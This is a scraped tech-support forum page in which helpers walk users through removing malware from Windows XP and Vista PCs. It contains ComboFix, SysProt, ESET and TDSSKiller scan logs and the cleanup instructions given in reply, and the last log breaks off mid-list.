2011-04-14 06:40 . 2008-07-08 22:0173728----a-w-c:\windows\system32\javacpl.cpl
2011-03-29 19:09 . 2011-03-29 19:0921504----a-w-c:\windows\system32\drivers\libusb0.sys
2011-03-29 19:09 . 2011-03-29 19:0937376----a-w-c:\windows\system32\libusb0.dll
.
.
((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"ehTray"="c:\windows\ehome\ehtray.exe" [2005-08-06 64512]
"RTHDCPL"="RTHDCPL.EXE" [2006-03-08 16010240]
"AlwaysReady Power Message APP"="ARPWRMSG.EXE" [2005-08-03 77312]
"NvCplDaemon"="c:\windows\system32\NvCpl.dll" [2006-01-25 7311360]
"nwiz"="nwiz.exe" [2006-01-25 1519616]
"HPHUPD08"="c:\program files\HP\Digital Imaging\{33D6CC28-9F75-4d1b-A11D-98895B3A3729}\hphupd08.exe" [2005-06-02 49152]
"Adobe Reader Speed Launcher"="c:\program files\Adobe\Reader 10.0\Reader\Reader_sl.exe" [2011-01-30 35736]
"Adobe ARM"="c:\program files\Common Files\Adobe\ARM\1.0\AdobeARM.exe" [2010-11-10 932288]
"MSC"="c:\program files\Microsoft Security Client\msseces.exe" [2010-11-30 997408]
"@OnlineArmor GUI"="c:\program files\Online Armor\OAui.exe" [2011-04-06 2477032]
.
c:\documents and settings\HP_Administrator\Start Menu\Programs\Startup\
wkcalrem.LNK - c:\program files\Common Files\Microsoft Shared\Works Shared\WkCalRem.exe [2004-6-23 15360]
.
c:\documents and settings\All Users\Start Menu\Programs\Startup\
HP Digital Imaging Monitor.lnk - c:\program files\HP\Digital Imaging\bin\hpqtra08.exe [2005-12-15 282624]
Updates From HP.lnk - c:\program files\Updates from HP\9972322\Program\Updates from HP.exe [2006-6-5 36903]
.
c:\documents and settings\Default User\Start Menu\Programs\Startup\
Pin.lnk - c:\hp\bin\CLOAKER.EXE [2006-6-5 27136]
.
[hkey_local_machine\software\microsoft\windows\currentversion\explorer\ShellExecuteHooks]
"{4F07DA45-8170-4859-9B5F-037EF2970034}"= "c:\progra~1\ONLINE~2\oaevent.dll" [2011-04-06 354720]
"{5AE067D3-9AFB-48E0-853A-EBB7F4A000DA}"= "c:\program files\SUPERAntiSpyware\SASSEH.DLL" [2008-05-13 77824]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\winlogon\notify\!SASWinLogon]
2009-09-03 22:21548352----a-w-c:\program files\SUPERAntiSpyware\SASWINLO.DLL
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MsMpSvc]
@="Service"
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\AppleSyncNotifier]
2009-08-13 19:51177440----a-w-c:\program files\Common Files\Apple\Mobile Device Support\bin\AppleSyncNotifier.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\D-Link RangeBooster G WUA-2340]
2006-09-01 16:091880064----a-w-c:\program files\D-Link\RangeBooster G WUA-2340\AirPlusCFG.exe
.
[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile]
"EnableFirewall"= 0 (0x0)
.
[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List]
"%windir%\\system32\\sessmgr.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\bin\\hpqtra08.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\bin\\hpqste08.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\bin\\hpofxm08.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\bin\\hposfx08.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\bin\\hposid01.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\bin\\hpqscnvw.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\bin\\hpqkygrp.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\bin\\hpqCopy.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\bin\\hpfccopy.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\bin\\hpzwiz01.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\Unload\\HpqPhUnl.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\Unload\\HpqDIA.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\bin\\hpoews01.exe"=
"c:\\Program Files\\HP\\Digital Imaging\\bin\\hpqnrs08.exe"=
"c:\\Program Files\\Updates from HP\\9972322\\Program\\Updates from HP.exe"=
"%windir%\\Network Diagnostic\\xpnetdiag.exe"=
"c:\\Program Files\\Bonjour\\mDNSResponder.exe"=
"c:\\Program Files\\iTunes\\iTunes.exe"=
"c:\\Program Files\\Adobe\\Photoshop 5.0 LE\\photosle.exe"=
.
[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\GloballyOpenPorts\List]
"57772:TCP"= 57772:TCP:Pando Media Booster
"57772:UDP"= 57772:UDP:Pando Media Booster
.
R0 sonypvl2;sonypvl2;c:\windows\system32\drivers\sonypvl2.sys [06/08/2006 1:38 PM 19478]
R1 MpKsl83bc2927;MpKsl83bc2927;c:\documents and settings\All Users\Application Data\Microsoft\Microsoft Antimalware\Definition Updates\{9FB231EF-0036-4D0F-85EA-3DF4A8ED3BAC}\MpKsl83bc2927.sys [26/05/2011 8:01 PM 28752]
R1 OADevice;OADriver;c:\windows\system32\drivers\OADriver.sys [23/05/2011 12:43 PM 205864]
R1 oahlpXX;Online Armor helper driver;c:\windows\system32\drivers\oahlp32.sys [23/05/2011 12:43 PM 39048]
R1 OAmon;OAmon;c:\windows\system32\drivers\OAmon.sys [23/05/2011 12:43 PM 25192]
R1 OAnet;OAnet;c:\windows\system32\drivers\OAnet.sys [23/05/2011 12:43 PM 29464]
R1 SASDIFSV;SASDIFSV;c:\program files\SUPERAntiSpyware\sasdifsv.sys [17/02/2010 2:25 PM 12872]
R1 SASKUTIL;SASKUTIL;c:\program files\SUPERAntiSpyware\SASKUTIL.SYS [10/05/2010 2:41 PM 67656]
R1 sonypvf2;sonypvf2;c:\windows\system32\drivers\sonypvf2.sys [06/08/2006 1:38 PM 635012]
R1 sonypvt2;sonypvt2;c:\windows\system32\drivers\sonypvt2.sys [06/08/2006 1:38 PM 431236]
R2 OAcat;Online Armor Helper Service;c:\program files\Online Armor\oacat.exe [23/05/2011 12:42 PM 381512]
R2 PCToolsSSDMonitorSvc;PC Tools Startup and Shutdown Monitor service;c:\program files\Common Files\PC Tools\sMonitor\StartManSvc.exe [08/08/2010 7:56 AM 583640]
R2 SvcOnlineArmor;Online Armor;c:\program files\Online Armor\oasrv.exe [23/05/2011 12:42 PM 4326472]
S1 MpKsl260ec945;MpKsl260ec945;\??\c:\documents and settings\All Users\Application Data\Microsoft\Microsoft Antimalware\Definition Updates\{6DE8016F-E060-4066-9D1D-0C92C0E051F9}\MpKsl260ec945.sys --> c:\documents and settings\All Users\Application Data\Microsoft\Microsoft Antimalware\Definition Updates\{6DE8016F-E060-4066-9D1D-0C92C0E051F9}\MpKsl260ec945.sys [?]
S3 A5AGU;D-Link USB Wireless Network Adapter Service;c:\windows\system32\drivers\A5AGU.sys [08/05/2006 7:10 PM 347648]
.
Contents of the 'Scheduled Tasks' folder
.
2011-05-21 c:\windows\Tasks\AppleSoftwareUpdate.job
- c:\program files\Apple Software Update\SoftwareUpdate.exe [2007-08-29 16:34]
.
2011-05-27 c:\windows\Tasks\MP Scheduled Scan.job
- c:\program files\Microsoft Security Client\Antimalware\MpCmdRun.exe [2010-11-11 16:26]
.
.
------- Supplementary Scan -------
.
uStart Page = hxxp://sympatico.msn.ca/
uDefault_Search_URL = hxxp://www.google.com/ie
mSearch Bar = hxxp://ie.redirect.hp.com/svs/rdr?TYPE=3&tp=iesearch&locale=EN_CA&c=63&bd=PAVILION&pf=desktop
uInternet Settings,ProxyOverride = *.local
uSearchAssistant = hxxp://www.google.com/ie
uSearchURL,(Default) = hxxp://www.google.com/search?q=%s
IE: E&xport to Microsoft Excel - c:\progra~1\MICROS~4\OFFICE11\EXCEL.EXE/3000
IE: eBay Search - c:\program files\eBay\eBay Toolbar2\eBayTb.dll/RCSearch.html
IE: Google Sidewiki... - c:\program files\Google\Google Toolbar\Component\GoogleToolbarDynamic_mui_en_6CE5017F567343CA.dll/cmsidewiki.html
TCP: DhcpNameServer = 192.168.2.1
DPF: {861DB4B6-3838-11D2-8E50-002018200E57} - hxxp://data6.archives.ca/mrsidi_cab/MrSIDI.cab
.
- - - - ORPHANS REMOVED - - - -
.
HKLM-Run-PCDrProfiler - (no file)
HKLM-Run-SunJavaUpdateSched - c:\program files\Java\jre6\bin\jusched.exe
.
.
.
**************************************************************************
.
catchme 0.3.1398 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
Rootkit scan 2011-05-26 20:24
Windows 5.1.2600 Service Pack 3 NTFS
.
scanning hidden processes ...
.
scanning hidden autostart entries ...
.
scanning hidden files ...
.
scan completed successfully
hidden files:
.
**************************************************************************
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{A483C63A-CDBC-426E-BF93-872502E8144E}]
@DENIED: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\WINDOWS\\system32\\Macromed\\Flash\\FlashUtil10p_ActiveX.exe,-101"
.
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{A483C63A-CDBC-426E-BF93-872502E8144E}\Elevation]
"Enabled"=dword:00000001
.
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{A483C63A-CDBC-426E-BF93-872502E8144E}\LocalServer32]
@="c:\\WINDOWS\\system32\\Macromed\\Flash\\FlashUtil10p_ActiveX.exe"
.
[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{A483C63A-CDBC-426E-BF93-872502E8144E}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
.
[HKEY_LOCAL_MACHINE\software\Classes\Interface\{E3F2C3CB-5EB8-4A04-B22C-7E3B4B6AF30F}]
@Denied: (A 2) (Everyone)
@="IFlashBroker4"
.
[HKEY_LOCAL_MACHINE\software\Classes\Interface\{E3F2C3CB-5EB8-4A04-B22C-7E3B4B6AF30F}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"
.
[HKEY_LOCAL_MACHINE\software\Classes\Interface\{E3F2C3CB-5EB8-4A04-B22C-7E3B4B6AF30F}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
--------------------- DLLs Loaded Under Running Processes ---------------------
.
- - - - - - - > 'winlogon.exe'(668)
c:\program files\SUPERAntiSpyware\SASWINLO.DLL
c:\windows\system32\WININET.dll
.
- - - - - - - > 'explorer.exe'(636)
c:\windows\system32\WININET.dll
c:\docume~1\HP_ADM~1\LOCALS~1\Temp\IadHide5.dll
c:\windows\system32\nview.dll
c:\windows\system32\nvwddi.dll
c:\windows\system32\ieframe.dll
.
------------------------ Other Running Processes ------------------------
.
c:\program files\Microsoft Security Client\Antimalware\MsMpEng.exe
c:\program files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
c:\windows\arservice.exe
c:\program files\Bonjour\mDNSResponder.exe
c:\windows\eHome\ehRecvr.exe
c:\windows\eHome\ehSched.exe
c:\program files\Java\jre6\bin\jqs.exe
c:\program files\Common Files\LightScribe\LSSrvc.exe
c:\program files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
c:\windows\system32\nvsvc32.exe
c:\windows\ehome\mcrdsvc.exe
c:\windows\system32\dllhost.exe
c:\windows\system32\wscntfy.exe
c:\windows\RTHDCPL.EXE
c:\windows\ARPWRMSG.EXE
c:\windows\system32\rundll32.exe
c:\windows\eHome\ehmsas.exe
c:\program files\Online Armor\OAhlp.exe
.
**************************************************************************
.
Completion time: 2011-05-26 20:30:29 - machine was rebooted
ComboFix-quarantined-files.txt 2011-05-27 00:30
ComboFix2.txt 2011-05-26 22:10
.
Pre-Run: 90,545,614,848 bytes free
Post-Run: 90,534,047,744 bytes free
.
- - End Of File - - 798D704585D07673445577B99431B60AQuote
Is there a way to stop the firewalls from starting. When Online Armor is disabled, Windows Firewall starts up and I have to jump to the Control panel to stop that.
Here's what I do with my firewall. If I'm installing a new program I disable my third-party firewall and enable my Windows firewall otherwise a 10 job will turn into a 30 min. chore.In fact, that's what I had to do when I tried to run ComboFix yesterday on my computer.

SysProt Antirootkit

Download
SysProt Antirootkit from the link below (you will find it at the bottom
of the page under attachments, or you can get it from one of the
mirrors).

http://sites.google.com/site/sysprotantirootkit/

Unzip it into a folder on your desktop.
  • Double click Sysprot.exe to start the program.
  • Click on the Log tab.
  • In the Write to log box select the following items.
    • Process << Selected
    • Kernel Modules << Selected
    • SSDT << Selected
    • Kernel Hooks << Selected
    • IRP Hooks << NOT Selected
    • Ports << NOT Selected
    • Hidden Files << Selected
  • At the bottom of the page
    • Hidden Objects Only << Selected
  • Click on the Create Log button on the bottom right.
  • After a few seconds a new window should appear.
  • Select Scan Root Drive. Click on the Start button.
  • When it is complete a new window will appear to indicate that the scan is finished.
  • The log will be saved automatically in the same folder Sysprot.exe was extracted to. Open the text file and copy/paste the log here.
Hi SuperDave,

I hope this is the complete scan as I had to do a search for it on my computer:

SysProt AntiRootkit v1.0.1.0
by swatkat

******************************************************************************************
******************************************************************************************

No Hidden Processes found

******************************************************************************************
******************************************************************************************
No Hidden Kernel Modules found

******************************************************************************************
******************************************************************************************
No SSDT Hooks found

******************************************************************************************
******************************************************************************************
No Kernel Hooks found

******************************************************************************************
******************************************************************************************
No hidden files/folders found

Just a note, Online Armor is back on my taskbar. When I shut down last night, Windows asked if I wanted to load the changes (probably from ComboFix).I'd like to scan your machine with ESET OnlineScan

•Hold down Control and click on the following link to open ESET OnlineScan in a new window.
ESET OnlineScan
•Click the button.
•For alternate browsers only: (Microsoft Internet Explorer users can skip these steps)
  • Click on to download the ESET SMART Installer. Save it to your desktop.
  • Double click on the icon on your desktop.
•Check
•Click the button.
•Accept any security warnings from your browser.
•Check
•Push the Start button.
•ESET will then download updates for itself, install itself, and begin scanning your computer. Please be patient as this can take some time.
•When the scan completes, push
•Push , and save the file to your desktop using a unique name, such as ESETScan. Include the contents of this report in your next reply.
•Push the button.
•Push
A log file will be saved here: C:\Program Files\ESET\ESET Online Scanner\log.txt
Hi SuperDave,

Here is what was on the log:

C:\System Volume Information\_restore{106CF321-99A3-4E3A-9103-1BD027606A99}\RP2\A0000064.iniWin32/Adware.AntimalwareDoctor.AE.Gen applicationPlease run ESET again and this time, clean the infection.Hi SuperDave,

Here is the file log:

C:\System Volume Information\_restore{106CF321-99A3-4E3A-9103-1BD027606A99}\RP2\A0000064.iniWin32/Adware.AntimalwareDoctor.AE.Gen applicationcleaned by deleting - quarantined

I checked delete upon exit before closing the program.That looks good. If there are no other issues, let's do some cleanup.

Download OTL to your desktop.

To remove all of the tools we used and the files and folders they created do the following:
Double click OTL.exe.
  • Click the CleanUp button.
  • Select Yes when the "Begin cleanup Process?" prompt appears.
  • If you are prompted to Reboot during the cleanup, select Yes.
  • The tool will delete itself once it finishes.
Note: If any tool, file or folder (belonging to the program we have used) hasn't been deleted, please delete it manually.
*********************************************************
To turn off Windows XP System Restore:

NOTE: These instructions ASSUME that you are using the default Windows XP Start Menu and have not changed to the Classic Start menu. To re-enable the default menu, right-click Start, click Properties, click Start menu (not Classic) and then click OK.

1. Click Start.
2. Right-click the My Computer icon, and then click Properties.
3. Click the System Restore tab.
4. Check "Turn off System Restore" or "Turn off System Restore on all drives"
5. Click Apply.
6. When turning off System Restore, the existing restore points will be deleted. Click Yes to do this.
7. Click OK.
8. Restart the computer and follow the instructions in the next section to turn on System Restore.

To turn on Windows XP System Restore:

1. Click Start.
2. Right-click My Computer, and then click Properties.
3. Click the System Restore tab.
4. Uncheck "Turn off System Restore" or "Turn off System Restore on all drives."
5. Click Apply, and then click OK.
*******************************************************
Clean out your temporary internet files and temp files.

Download TFC by OldTimer to your desktop.

Double-click TFC.exe to run it.

Note: If you are running on Vista, right-click on the file and choose Run As Administrator

TFC will close all programs when run, so make sure you have saved all your work before you begin.

* Click the Start button to begin the cleaning process.
* Depending on how often you clean temp files, execution time should be anywhere from a few seconds to a minute or two.
* Please let TFC run uninterrupted until it is finished.

Once TFC is finished it should restart your computer. If it does not, please manually restart the computer yourself to ensure a complete cleaning.
*****************************************************
Use the Secunia Software Inspector to check for out of date software.

•Click Start Now

•Check the box next to Enable thorough system inspection.

•Click Start

•Allow the scan to finish and scroll down to see if any updates are needed.
•Update anything listed.
.
----------

Go to Microsoft Windows Update and get all critical updates.

----------

I suggest using WOT - Web of Trust. WOT is a free Internet security addon for your browser. It will keep you safe from online scams, identity theft, spyware, spam, viruses and unreliable shopping sites. WOT warns you before you interact with a risky website. It's easy and it's free.

SpywareBlaster- Secure your Internet Explorer to make it harder for ActiveX programs to run on your computer. Also stop certain cookies from being added to your computer when running Mozilla based browsers like Firefox.
* Using SpywareBlaster to protect your computer from Spyware and Malware
* If you don't know what ActiveX controls are, see here

Protect yourself against spyware using the Immunize feature in Spybot - Search & Destroy. Guide: Use Spybot's Immunize Feature to prevent spyware infection in real-time. Note: To ensure you have the latest Immunizations always update Spybot - Search & Destroy before Immunizing. Spybot - Search & Destroy FAQ

Check out Keeping Yourself Safe On The Web for tips and free tools to help keep you safe in the future.

Also see Slow Computer? It may not be Malware for free cleaning/maintenance tools to help keep your computer running smoothly.
Safe Surfing!
Discussion
3268.

Solve : "Open With" window/can't run the programs.?

Answer»

I removed a virus from my PC but, now I get that "Open With" WINDOW, and can't run programs. like Firefox etc.At least not without selecting the program I want to open it with each time.
I'm running Windows XP Home Edition.

I have TIRED going to http://www.dougknox.com/xp/file_assoc.htm already and I did the below steps but,no luck.

[Look to the "EXE File Association Fix", and download the .ZIP file to your computer desktop.. Once there, unzip the file, then double click on the "xp_exe_fix.reg" file that is inside, CHOOSE "OK/Yes, when it asks "Are you sure?".. Restart the computer.. It should now run those problem programs and Control Panel icons.]


HELP?
Discussion
3269.

Solve : Programs closing down randomly (Vista)?

Answer»

"Malware Finder has stopped working"

Stops working as soon as I press scan. Just my luck Please re-boot in Safe Mode and try run these two scans.Doesn't work in safe mode eitherOk Let's try this:

  • Download TDSSKiller and save it to your Desktop.
  • Extract its contents to your desktop.
  • Once extracted, open the TDSSKiller folder and doubleclick on TDSSKiller.exe to run the application, then on Start Scan.
  • If an infected file is detected, the default action will be Cure, click on Continue.
  • If a suspicious file is detected, the default action will be Skip, click on Continue.
  • It may ask you to reboot the computer to complete the process. Click on Reboot Now.
  • Click the Report button and copy/paste the contents of it into your next reply
Note:It will also create a log in the C:\ directory..
It did detect some rootkit problem I've encountered before and was having a hard time removing.


2011/05/26 22:33:36.0475 4888TDSS rootkit removing TOOL 2.5.3.0 May 25 2011 07:09:24
2011/05/26 22:33:36.0598 4888================================================================================
2011/05/26 22:33:36.0598 4888SystemInfo:
2011/05/26 22:33:36.0598 4888
2011/05/26 22:33:36.0598 4888OS Version: 6.0.6002 ServicePack: 2.0
2011/05/26 22:33:36.0598 4888Product type: Workstation
2011/05/26 22:33:36.0598 4888ComputerName: TRINCA-NA-PÊRA
2011/05/26 22:33:36.0598 4888UserName: Ramiro
2011/05/26 22:33:36.0598 4888Windows directory: C:\Windows
2011/05/26 22:33:36.0598 4888System windows directory: C:\Windows
2011/05/26 22:33:36.0598 4888Running under WOW64
2011/05/26 22:33:36.0598 4888Processor architecture: Intel x64
2011/05/26 22:33:36.0598 4888Number of processors: 4
2011/05/26 22:33:36.0598 4888Page size: 0x1000
2011/05/26 22:33:36.0599 4888Boot type: Normal boot
2011/05/26 22:33:36.0599 4888================================================================================
2011/05/26 22:33:37.0001 4888Initialize success
2011/05/26 22:33:46.0110 4576================================================================================
2011/05/26 22:33:46.0110 4576Scan STARTED
2011/05/26 22:33:46.0110 4576Mode: Manual;
2011/05/26 22:33:46.0110 4576================================================================================
2011/05/26 22:33:46.0660 4576ACPI (1965aaffab07e3fb03c77f81beba3547) C:\Windows\system32\drivers\acpi.sys
2011/05/26 22:33:46.0709 4576adp94xx (f14215e37cf124104575073f782111d2) C:\Windows\system32\drivers\adp94xx.sys
2011/05/26 22:33:46.0743 4576adpahci (7d05a75e3066861a6610f7ee04ff085c) C:\Windows\system32\drivers\adpahci.sys
2011/05/26 22:33:46.0764 4576adpu160m (820a201fe08a0c345b3bedbc30e1a77c) C:\Windows\system32\drivers\adpu160m.sys
2011/05/26 22:33:46.0780 4576adpu320 (9b4ab6854559dc168fbb4c24fc52e794) C:\Windows\system32\drivers\adpu320.sys
2011/05/26 22:33:46.0846 4576AFD (12415ccfd3e7cec55b5184e67b039fe4) C:\Windows\system32\drivers\afd.sys
2011/05/26 22:33:46.0877 4576agp440 (f6f6793b7f17b550ecfdbd3b229173f7) C:\Windows\system32\drivers\agp440.sys
2011/05/26 22:33:46.0899 4576aic78xx (222cb641b4b8a1d1126f8033f9fd6a00) C:\Windows\system32\drivers\djsvs.sys
2011/05/26 22:33:46.0933 4576aliide (157d0898d4b73f075ce9fa26b482df98) C:\Windows\system32\drivers\aliide.sys
2011/05/26 22:33:47.0002 4576amdide (970fa5059e61e30d25307b99903e991e) C:\Windows\system32\drivers\amdide.sys
2011/05/26 22:33:47.0025 4576AmdK8 (cdc3632a3a5ea4dbb83e46076a3165a1) C:\Windows\system32\drivers\amdk8.sys
2011/05/26 22:33:47.0222 4576amdkmdag (d1d06810bf7e21f5763eb06cb7e7262b) C:\Windows\system32\DRIVERS\atipmdag.sys
2011/05/26 22:33:47.0336 4576amdkmdap (6ba71d6616b56816e57394d77dd1bb6f) C:\Windows\system32\DRIVERS\atikmpag.sys
2011/05/26 22:33:47.0398 4576arc (ba8417d4765f3988ff921f30f630e303) C:\Windows\system32\drivers\arc.sys
2011/05/26 22:33:47.0428 4576arcsas (9d41c435619733b34cc16a511e644b11) C:\Windows\system32\drivers\arcsas.sys
2011/05/26 22:33:47.0478 4576AsyncMac (22d13ff3dafec2a80634752b1eaa2de6) C:\Windows\system32\DRIVERS\asyncmac.sys
2011/05/26 22:33:47.0493 4576atapi (1898fae8e07d97f2f6c2d5326c633fac) C:\Windows\system32\drivers\atapi.sys
2011/05/26 22:33:47.0589 4576AtiHdmiService (08fa104f07b243508ecd8d59007d2b2f) C:\Windows\system32\drivers\AtiHdmi.sys
2011/05/26 22:33:47.0767 4576atikmdag (d1d06810bf7e21f5763eb06cb7e7262b) C:\Windows\system32\DRIVERS\atikmdag.sys
2011/05/26 22:33:48.0020 4576Avgldx64 (91be0147bc27059aba6d0a478adeb1ee) C:\Windows\system32\DRIVERS\avgldx64.sys
2011/05/26 22:33:48.0044 4576Avgmfx64 (f5ffa3053d26c55edc112e66197eed09) C:\Windows\system32\DRIVERS\avgmfx64.sys
2011/05/26 22:33:48.0144 4576blbdrive (79feeb40056683f8f61398d81dda65d2) C:\Windows\system32\drivers\blbdrive.sys
2011/05/26 22:33:48.0191 4576bowser (2348447a80920b2493a9b582a23e81e1) C:\Windows\system32\DRIVERS\bowser.sys
2011/05/26 22:33:48.0213 4576BrFiltLo (f09eee9edc320b5e1501f749fde686c8) C:\Windows\system32\drivers\brfiltlo.sys
2011/05/26 22:33:48.0235 4576BrFiltUp (b114d3098e9bdb8bea8b053685831be6) C:\Windows\system32\drivers\brfiltup.sys
2011/05/26 22:33:48.0263 4576Brserid (f0f0ba4d815be446aa6a4583ca3bca9b) C:\Windows\system32\drivers\brserid.sys
2011/05/26 22:33:48.0285 4576BrSerWdm (a6eca2151b08a09caceca35c07f05b42) C:\Windows\system32\drivers\brserwdm.sys
2011/05/26 22:33:48.0302 4576BrUsbMdm (b79968002c277e869cf38bd22cd61524) C:\Windows\system32\drivers\brusbmdm.sys
2011/05/26 22:33:48.0321 4576BrUsbSer (a87528880231c54e75ea7a44943b38bf) C:\Windows\system32\drivers\brusbser.sys
2011/05/26 22:33:48.0335 4576BTHMODEM (e0777b34e05f8a82a21856efc900c29f) C:\Windows\system32\drivers\bthmodem.sys
2011/05/26 22:33:48.0378 4576cdfs (b4d787db8d30793a4d4df9feed18f136) C:\Windows\system32\DRIVERS\cdfs.sys
2011/05/26 22:33:48.0419 4576cdrom (c025aa69be3d0d25c7a2e746ef6f94fc) C:\Windows\system32\DRIVERS\cdrom.sys
2011/05/26 22:33:48.0446 4576circlass (02ea568d498bbdd4ba55bf3fce34d456) C:\Windows\system32\drivers\circlass.sys
2011/05/26 22:33:48.0497 4576CLFS (3dca9a18b204939cfb24bea53e31eb48) C:\Windows\system32\CLFS.sys
2011/05/26 22:33:48.0562 4576cmdide (e5d5499a1c50a54b5161296b6afe6192) C:\Windows\system32\drivers\cmdide.sys
2011/05/26 22:33:48.0584 4576Compbatt (7fb8ad01db0eabe60c8a861531a8f431) C:\Windows\system32\drivers\compbatt.sys
2011/05/26 22:33:48.0608 4576crcdisk (a8585b6412253803ce8efcbd6d6dc15c) C:\Windows\system32\drivers\crcdisk.sys
2011/05/26 22:33:48.0659 4576DfsC (36cd31121f228e7e79bae60aa45764c6) C:\Windows\system32\Drivers\dfsc.sys
2011/05/26 22:33:48.0691 4576disk (b0107e40ecdb5fa692ebf832f295d905) C:\Windows\system32\drivers\disk.sys
2011/05/26 22:33:48.0750 4576Dot4 (74c02b1717740c3b8039539e23e4b53f) C:\Windows\system32\DRIVERS\Dot4.sys
2011/05/26 22:33:48.0772 4576Dot4Print (08321d1860235bf42cf2854234337aea) C:\Windows\system32\DRIVERS\Dot4Prt.sys
2011/05/26 22:33:48.0818 4576dot4usb (4adccf0124f2b6911d3786a5d0e779e5) C:\Windows\system32\DRIVERS\dot4usb.sys
2011/05/26 22:33:48.0860 4576drmkaud (f1a78a98cfc2ee02144c6bec945447e6) C:\Windows\system32\drivers\drmkaud.sys
2011/05/26 22:33:48.0925 4576DXGKrnl (b8e554e502d5123bc111f99d6a2181b4) C:\Windows\System32\drivers\dxgkrnl.sys
2011/05/26 22:33:48.0957 4576E1G60 (264cee7b031a9d6c827f3d0cb031f2fe) C:\Windows\system32\DRIVERS\E1G6032E.sys
2011/05/26 22:33:48.0977 4576Ecache (5f94962be5a62db6e447ff6470c4f48a) C:\Windows\system32\drivers\ecache.sys
2011/05/26 22:33:49.0027 4576elxstor (c4636d6e10469404ab5308d9fd45ed07) C:\Windows\system32\drivers\elxstor.sys
2011/05/26 22:33:49.0064 4576ErrDev (bc3a58e938bb277e46bf4b3003b01abd) C:\Windows\system32\drivers\errdev.sys
2011/05/26 22:33:49.0103 4576exfat (486844f47b6636044a42454614ed4523) C:\Windows\system32\drivers\exfat.sys
2011/05/26 22:33:49.0147 4576fastfat (1a4bee34277784619ddaf0422c0c6e23) C:\Windows\system32\drivers\fastfat.sys
2011/05/26 22:33:49.0172 4576fdc (81b79b6df71fa1d2c6d688d830616e39) C:\Windows\system32\DRIVERS\fdc.sys
2011/05/26 22:33:49.0207 4576FileInfo (457b7d1d533e4bd62a99aed9c7bb4c59) C:\Windows\system32\drivers\fileinfo.sys
2011/05/26 22:33:49.0235 4576Filetrace (d421327fd6efccaf884a54c58e1b0d7f) C:\Windows\system32\drivers\filetrace.sys
2011/05/26 22:33:49.0268 4576flpydisk (230923ea2b80f79b0f88d90f87b87ebd) C:\Windows\system32\DRIVERS\flpydisk.sys
2011/05/26 22:33:49.0319 4576FltMgr (e3041bc26d6930d61f42aedb79c91720) C:\Windows\system32\drivers\fltmgr.sys
2011/05/26 22:33:49.0348 4576Fs_Rec (29d99e860a1ca0a03c6a733fdd0da703) C:\Windows\system32\drivers\Fs_Rec.sys
2011/05/26 22:33:49.0366 4576gagp30kx (c8e416668d3dc2be3d4fe4c79224997f) C:\Windows\system32\drivers\gagp30kx.sys
2011/05/26 22:33:49.0419 4576GEARAspiWDM (e403aacf8c7bb11375122d2464560311) C:\Windows\system32\DRIVERS\GEARAspiWDM.sys
2011/05/26 22:33:49.0488 4576HdAudAddService (68e732382b32417ff61fd663259b4b09) C:\Windows\system32\drivers\HdAudio.sys
2011/05/26 22:33:49.0682 4576HDAudBus (f942c5820205f2fb453243edfec82a3d) C:\Windows\system32\DRIVERS\HDAudBus.sys
2011/05/26 22:33:49.0708 4576HidBth (b4881c84a180e75b8c25dc1d726c375f) C:\Windows\system32\drivers\hidbth.sys
2011/05/26 22:33:49.0726 4576HidIr (4e77a77e2c986e8f88f996bb3e1ad829) C:\Windows\system32\drivers\hidir.sys
2011/05/26 22:33:49.0778 4576HidUsb (443bdd2d30bb4f00795c797e2cf99edf) C:\Windows\system32\DRIVERS\hidusb.sys
2011/05/26 22:33:49.0801 4576HpCISSs (d7109a1e6bd2dfdbcba72a6bc626a13b) C:\Windows\system32\drivers\hpcisss.sys
2011/05/26 22:33:49.0930 4576HTTP (098f1e4e5c9cb5b0063a959063631610) C:\Windows\system32\drivers\HTTP.sys
2011/05/26 22:33:49.0976 4576i2omp (da94c854cea5fac549d4e1f6e88349e8) C:\Windows\system32\drivers\i2omp.sys
2011/05/26 22:33:50.0002 4576i8042prt (cbb597659a2713ce0c9cc20c88c7591f) C:\Windows\system32\DRIVERS\i8042prt.sys
2011/05/26 22:33:50.0044 4576iaStor (5979854e6fda990107e3170327022117) C:\Windows\system32\drivers\iastor.sys
2011/05/26 22:33:50.0073 4576iaStorV (3e3bf3627d886736d0b4e90054f929f6) C:\Windows\system32\drivers\iastorv.sys
